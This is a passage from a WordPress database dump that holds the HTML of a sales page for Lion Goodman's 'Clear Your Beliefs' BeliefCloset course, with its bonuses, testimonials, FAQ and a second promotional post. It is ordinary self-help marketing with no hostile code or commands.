class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:07:23', '2014-06-17 21:07:23', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(936, 4194, '2014-06-17 16:35:33', '2014-06-17 21:35:33', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was 